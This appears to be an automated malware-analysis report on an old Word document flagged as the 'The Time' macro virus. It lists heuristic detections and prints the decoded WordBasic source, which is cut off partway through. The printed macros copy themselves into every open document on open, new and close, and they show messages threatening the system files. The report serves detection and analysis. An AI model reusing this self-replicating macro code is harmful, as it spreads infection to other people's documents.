MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macros, including AutoOpen and AutoClose, which are indicative of older malware techniques. The script itself, named 'TheTime', displays numerous message boxes to the user, including a message about deleting 'COMMAND.COM' and 'AUTOEXEC.BAT', suggesting a destructive or disruptive intent. While no direct payload execution or network communication is evident in the provided script, the presence of these macros and the suggestive messages warrant a high level of suspicion.
Heuristics 5
-
ClamAV: Legacy.Trojan.Agent-658 critical CLAMAV_DETECTIONClamAV detected this file as malware: Legacy.Trojan.Agent-658
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5856 bytes |
SHA-256: 9d3f02e215f20a54674b5895ec37cd2cf4aca8ec0f3e916f5fdfd87fa0a014e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "TheTime"
Public Sub MAIN()
If WordBasic.Hour(WordBasic.Now()) = 15 And WordBasic.Minute(WordBasic.Now()) = 59 Then
Else
GoTo Finish
End If
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.MsgBox "Hi I´m the Time virus"
WordBasic.Beep
WordBasic.MsgBox " I don´t like Your COMMAND.COM and AUTOEXEC.BAT"
WordBasic.Beep
WordBasic.MsgBox "Play with me !! :-) "
WordBasic.Beep
WordBasic.MsgBox " You have 1 Minute time to find me"
WordBasic.Beep
WordBasic.MsgBox " Find me, I do nothing"
WordBasic.Beep
WordBasic.MsgBox " Find me not "
WordBasic.Beep
WordBasic.MsgBox " SAY BYE TO YOUR COMMAND.COM AND AUTOEXEC.BAT"
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
Finish:
End Sub
Attribute VB_Name = "AutoNew"
Public Sub MAIN()
Dim i
Dim VInstalled
Dim Erro
On Error GoTo -1: On Error GoTo Finish
For i = 1 To WordBasic.CountMacros(1, 0)
If WordBasic.[MacroName$](i, 1, 1) = "TheTime" Then
VInstalled = 1
End If
Next i
If VInstalled = 1 Then
GoTo Finish
Else
On Erro Resume Next
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Global:TheTime", WordBasic.[FileName$]() + ":TheTime", 1
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[FileName$]() + ":AutoExec", 1
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", 1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", 1
WordBasic.MacroCopy "Global:Kill", WordBasic.[FileName$]() + ":Kill", 1
WordBasic.FileSaveAll 1, 0
End If
Finish:
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Dim i
Dim VInstalled
On Error GoTo -1: On Error GoTo Finish
For i = 1 To WordBasic.CountMacros(1, 0)
If WordBasic.[MacroName$](i, 1, 1) = "TheTime" Then
VInstalled = 1
End If
Next i
If VInstalled = 1 Then
GoTo Finish
Else
On Error Resume Next
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Global:TheTime", WordBasic.[FileName$]() + ":TheTime", 1
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[FileName$]() + ":AutoExec", 1
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", 1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", 1
WordBasic.MacroCopy "Global:Kill", WordBasic.[FileName$]() + ":Kill", 1
WordBasic.FileSaveAll 1, 0
End If
Finish:
End Sub
Attribute VB_Name = "AutoExec"
Public Sub MAIN()
WordBasic.Call "AutoOpen"
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim i
Dim VInstalled
WordBasic.ToggleFull
WordBasic.InsertPara
WordBasic.Insert Chr(9) + Chr(9) + Chr(9) + Chr(9) + Chr(9)
WordBasic.Bold
WordBasic.FontSize 18
WordBasic.Insert "You are infected with"
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 72
WordBasic.Insert Chr(9) + Chr(9) + Chr(9) + Chr(9) + "The Time"
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 25
Wor
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.